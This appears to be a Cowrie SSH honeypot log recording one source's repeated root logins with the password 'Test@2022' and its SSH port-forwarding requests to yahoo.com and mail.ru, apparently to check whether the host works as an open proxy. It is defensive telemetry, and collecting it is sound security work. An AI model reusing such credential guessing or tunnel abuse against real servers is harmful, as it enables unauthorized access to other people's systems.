{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:33.658957Z","src_ip":"77.83.207.83","session":"89bd7159b018"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:45:33.711869Z","src_ip":"77.83.207.83","session":"89bd7159b018"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":49707,"dst_ip":"1.2.3.4","dst_port":22,"session":"ff4162c1d45f","protocol":"ssh","message":"New connection: 77.83.207.83:49707 (1.2.3.4:22) [session: ff4162c1d45f]","sensor":"my-vps","timestamp":"2025-08-31T03:45:33.760344Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:45:33.761155Z","src_ip":"77.83.207.83","session":"ff4162c1d45f"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:45:33.810931Z","src_ip":"77.83.207.83","session":"ff4162c1d45f"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:45:34.058301Z","src_ip":"77.83.207.83","session":"ff4162c1d45f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":4065,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:4065","sensor":"my-vps","timestamp":"2025-08-31T03:45:34.109833Z","session":"ff4162c1d45f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:34.159509Z","src_ip":"77.83.207.83","session":"ff4162c1d45f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"77.83.207.83","src_port":16024,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:16024","sensor":"my-vps","timestamp":"2025-08-31T03:45:34.299890Z","session":"ff4162c1d45f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:34.349324Z","src_ip":"77.83.207.83","session":"ff4162c1d45f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":18499,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:18499","sensor":"my-vps","timestamp":"2025-08-31T03:45:34.491946Z","session":"ff4162c1d45f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:34.541646Z","src_ip":"77.83.207.83","session":"ff4162c1d45f"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:45:34.591610Z","src_ip":"77.83.207.83","session":"ff4162c1d45f"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":49812,"dst_ip":"1.2.3.4","dst_port":22,"session":"d629b59ba9ff","protocol":"ssh","message":"New connection: 77.83.207.83:49812 (1.2.3.4:22) [session: d629b59ba9ff]","sensor":"my-vps","timestamp":"2025-08-31T03:45:34.641814Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:45:34.642934Z","src_ip":"77.83.207.83","session":"d629b59ba9ff"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:45:34.693132Z","src_ip":"77.83.207.83","session":"d629b59ba9ff"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:45:34.943951Z","src_ip":"77.83.207.83","session":"d629b59ba9ff"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":15072,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:15072","sensor":"my-vps","timestamp":"2025-08-31T03:45:34.995179Z","session":"d629b59ba9ff"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:35.045695Z","src_ip":"77.83.207.83","session":"d629b59ba9ff"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"77.83.207.83","src_port":11082,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:11082","sensor":"my-vps","timestamp":"2025-08-31T03:45:35.188933Z","session":"d629b59ba9ff"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:35.239364Z","src_ip":"77.83.207.83","session":"d629b59ba9ff"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":17375,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:17375","sensor":"my-vps","timestamp":"2025-08-31T03:45:35.380735Z","session":"d629b59ba9ff"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:35.431067Z","src_ip":"77.83.207.83","session":"d629b59ba9ff"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:45:35.482045Z","src_ip":"77.83.207.83","session":"d629b59ba9ff"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":49914,"dst_ip":"1.2.3.4","dst_port":22,"session":"0da26eac68c0","protocol":"ssh","message":"New connection: 77.83.207.83:49914 (1.2.3.4:22) [session: 0da26eac68c0]","sensor":"my-vps","timestamp":"2025-08-31T03:45:35.531420Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:45:35.533837Z","src_ip":"77.83.207.83","session":"0da26eac68c0"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:45:35.584225Z","src_ip":"77.83.207.83","session":"0da26eac68c0"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:45:35.834858Z","src_ip":"77.83.207.83","session":"0da26eac68c0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":1285,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:1285","sensor":"my-vps","timestamp":"2025-08-31T03:45:35.886613Z","session":"0da26eac68c0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:35.937036Z","src_ip":"77.83.207.83","session":"0da26eac68c0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":12091,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:12091","sensor":"my-vps","timestamp":"2025-08-31T03:45:36.081288Z","session":"0da26eac68c0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:36.131737Z","src_ip":"77.83.207.83","session":"0da26eac68c0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":19035,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:19035","sensor":"my-vps","timestamp":"2025-08-31T03:45:36.272687Z","session":"0da26eac68c0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:36.323104Z","src_ip":"77.83.207.83","session":"0da26eac68c0"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:45:36.374633Z","src_ip":"77.83.207.83","session":"0da26eac68c0"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":50020,"dst_ip":"1.2.3.4","dst_port":22,"session":"77e8a5cc364d","protocol":"ssh","message":"New connection: 77.83.207.83:50020 (1.2.3.4:22) [session: 77e8a5cc364d]","sensor":"my-vps","timestamp":"2025-08-31T03:45:36.424208Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:45:36.425469Z","src_ip":"77.83.207.83","session":"77e8a5cc364d"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:45:36.476015Z","src_ip":"77.83.207.83","session":"77e8a5cc364d"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:45:36.727684Z","src_ip":"77.83.207.83","session":"77e8a5cc364d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":7218,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:7218","sensor":"my-vps","timestamp":"2025-08-31T03:45:36.779036Z","session":"77e8a5cc364d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:36.829922Z","src_ip":"77.83.207.83","session":"77e8a5cc364d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"77.83.207.83","src_port":12446,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:12446","sensor":"my-vps","timestamp":"2025-08-31T03:45:36.972854Z","session":"77e8a5cc364d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:37.023568Z","src_ip":"77.83.207.83","session":"77e8a5cc364d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":26576,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:26576","sensor":"my-vps","timestamp":"2025-08-31T03:45:37.169042Z","session":"77e8a5cc364d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:37.219655Z","src_ip":"77.83.207.83","session":"77e8a5cc364d"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:45:37.271419Z","src_ip":"77.83.207.83","session":"77e8a5cc364d"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":50130,"dst_ip":"1.2.3.4","dst_port":22,"session":"cc6bf5587dab","protocol":"ssh","message":"New connection: 77.83.207.83:50130 (1.2.3.4:22) [session: cc6bf5587dab]","sensor":"my-vps","timestamp":"2025-08-31T03:45:37.323581Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:45:37.333316Z","src_ip":"77.83.207.83","session":"cc6bf5587dab"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:45:37.377370Z","src_ip":"77.83.207.83","session":"cc6bf5587dab"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:45:37.642892Z","src_ip":"77.83.207.83","session":"cc6bf5587dab"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":25444,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:25444","sensor":"my-vps","timestamp":"2025-08-31T03:45:37.697703Z","session":"cc6bf5587dab"}
